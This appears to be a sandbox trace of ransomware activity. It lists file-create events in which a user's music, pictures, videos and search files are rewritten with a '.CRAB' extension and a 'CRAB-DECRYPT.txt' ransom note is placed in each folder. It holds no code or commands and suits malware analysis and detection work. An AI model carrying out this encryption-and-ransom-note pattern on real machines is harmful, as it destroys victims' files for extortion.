Create C:\Users\FD1HVy\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Music\8XKr9UondK7HfQ_.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\cncm99iBl_pZ y19GI1.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\e0xXYk0RvA.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\IgBW.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\vFZyOE7kpL4WdPzfE nh.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\5azA5dB.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\7SyMDxz.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\BYRGcfMS2xhsA2P8LOqd.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\Fi xD_oU8B0.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\g2iNgl1Ejue.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\iSy-5H_mW7fO_0bny.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\lW7aSkPzsKRu.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\m_Q5.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\TBYYu.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\WOvQSzstN 6DMRwpD9V\Usg8kes6SkGgH.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\wz5Q5Oeqnj83 GZF5.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\XIH1zhazZ.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\D8FguvX.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\DBO-RSHudyAtj-RlTubj.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\DGI4vf8.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\eDzslKd2O1.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\nVD1jMJXBF7YRS2_gzhO.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\ocvq5cWJ-AdJX.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\RpZ3Xc9VkCAf_ UnOV.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\u4Lass9yFIos I5RQWd.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\xZRV-VRm4dbZ8k4\_HePOGhMBfYD058.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\Yv7Ftl3F09hnBjx4vDR.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Music\z5GYkMs5t.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\ntuser.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\OneDrive\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Pictures\Camera Roll\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\hVFIY.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\5ujP.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\7lIrX6a\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\7lIrX6a\BiIHzG8JKENJcxppZ5Dc.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\7lIrX6a\bWKk.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\7lIrX6a\s_ qaN6Q_6AP8S.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\5dr6uGRL9LK.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\Dw_y8M1l.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\ts9a1ZFmkfPLzfmEAP.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\-S1f9wAJn.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\2aw4w81o3DFWfT-WwQ.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\cyPILVniYbns9jSEv2A1.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\KnQu_Ib-e1e.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\kThd5OHZJ\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\O_Yc nVeBil2M4fIBX\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\O_Yc nVeBil2M4fIBX\G5MDS6EDWyI.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\O_Yc nVeBil2M4fIBX\k8Lcagnl6W9E7tF.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\O_Yc nVeBil2M4fIBX\V1sg_IGvpNq8.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\PmFXKCUPXBcdHjs0.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\V0JbnnP81i\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\V0JbnnP81i\5IsTuOq_762rS3uGw.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\V0JbnnP81i\txMx_XwF_3.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\comuSmTYxB\vInbQ8Syjp2d7\V0JbnnP81i\WdgO1y0b9sTOIQU74ZC.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\efiQWECJx.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\TJaIFSScpPFx\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\TJaIFSScpPFx\bJQy5P.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\TJaIFSScpPFx\hDikpPVPk.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\TJaIFSScpPFx\ikEQfJ5_ZHdFc.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\TJaIFSScpPFx\nk3nbPIYfLs4x07wJ.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\TJaIFSScpPFx\vmshNxHSOQoT.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\TJaIFSScpPFx\y0NsqWYVq3.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\FlnwG8qn7iA8VvmIzna\ZPGtvNw.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\iJZbAuk4TzPFE0-IX0yX.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\n5UPsqzg.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\P4pG8yX7JX.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\jJ8mB\_EwYk2q tK h2VhRe.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Pictures\Saved Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Searches\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Searches\Everywhere.search-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Searches\Indexed Locations.search-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\FD1HVy\Videos\04wiePIT.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\2j3i_Lv_6p.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\7xX0LKB_.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\9DacIikfIkX 20nTL-1.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\bnLzb.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\d4WYV4lg2fVP2kVD0s.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\e1a51uu0C Hca.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\FtS1uC Fp.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\i7x2aGiKw5LAAkmGf.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\IvmZ.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\I_HNPpN1Uh5jlv1Co.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\J0jWIM8B0YR.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\j5IV.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\jmxzUtYA_.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\kkG91p6l-Fj7Bpge6.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\kMcR0.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\P4pjXYuNsZS.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\PmEG5TRLE.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\PtJSVBcywVLa.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\p_O9_RlNXLZqo_CP.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\QJnVGj4G.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\s9-lmKv4iWBJv.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\SMyn.mp4.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\TSch7Rh_L5i_lC.flv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\uzdeG0D_x4.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\wHCY6G H.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\WRuFtpic.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\XoSEs2.avi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\y06 s3uhnsTa.mkv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Videos\YCsU2jX4ETqZC.swf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\AccountPictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
